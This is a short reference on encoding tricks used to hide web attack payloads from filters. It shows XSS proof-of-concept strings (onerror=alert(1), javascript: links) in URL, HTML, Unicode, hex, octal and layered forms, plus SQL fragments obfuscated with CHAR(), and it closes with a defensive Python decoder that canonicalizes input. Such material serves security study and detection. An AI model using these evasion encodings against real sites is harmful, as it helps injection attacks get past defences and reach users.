Obfuscation
URL encoding:
[...]/?search=Fish+%26+Chips
Double URL encoding:
[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
HTML encoding:
<img src=x onerror="alert(1)">
<a href="javascript:alert(1)">Click me</a>
XML encoding:
<stockCheck>
<productId>
123
</productId>
<storeId>
999 SELECT * FROM information_schema.tables
</storeId>
</stockCheck>
Unicode encoding:
eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>
Hex escaping:
eval("\x61lert")
Octal escaping:
eval("\141lert(1)")
Multiple encodings:
<a href="javascript:\u0061lert(1)">Click me</a>
The browser will first HTML decode the encoded backslash to \, turning u0061 into the Unicode escape \u0061, which then decodes to a.
SQL char() function:
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
Decodes to SELECT.
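
The layered cases above (double URL encoding, and HTML encoding wrapped around a JavaScript escape) get past filters that decode once and then match. The following is an added example, not code from the original page: a defensive canonicalizer that decodes URL, HTML and JavaScript escape layers until the value stops changing and records which layers it removed, so a filter or log rule can act on the final form. The names `canonicalize` and `is_layered` are hypothetical, and the sample with `&#x5c;` is constructed.

```python
import html
import re
from urllib.parse import unquote

# \u{...}, \uXXXX, \xHH and octal escapes as used in JavaScript strings
_JS_ESC = re.compile(
    r"\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})"
)

def _js_unescape(s):
    def repl(m):
        braced, u4, x2, octal = m.groups()
        cp = int(octal, 8) if octal else int(braced or u4 or x2, 16)
        # Leave out-of-range code points untouched instead of raising
        return chr(cp) if cp <= 0x10FFFF else m.group(0)
    return _JS_ESC.sub(repl, s)

# Order mirrors the usual path: transport (URL), markup (HTML), script (JS)
DECODERS = [("url", unquote), ("html", html.unescape), ("js", _js_unescape)]

def canonicalize(value, max_rounds=8):
    """Decode repeatedly until nothing changes; return (canonical, layers)."""
    layers = []
    for _ in range(max_rounds):  # bounded so hostile input cannot loop forever
        before = value
        for name, decode in DECODERS:
            decoded = decode(value)
            if decoded != value:
                layers.append(name)
                value = decoded
        if value == before:
            break
    return value, layers

def is_layered(value):
    """True when more than one decoding layer was needed: worth flagging."""
    return len(canonicalize(value)[1]) > 1

if __name__ == "__main__":
    samples = [
        "Fish+%26+Chips",                                    # from the page
        "%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E",  # from the page
        r"javascript:&#x5c;u0061lert(1)",                    # constructed sample
    ]
    for s in samples:
        print(canonicalize(s), is_layered(s))
```

Run validation and logging against the canonical value, and treat `is_layered` as a signal in its own right, since ordinary clients rarely stack encodings.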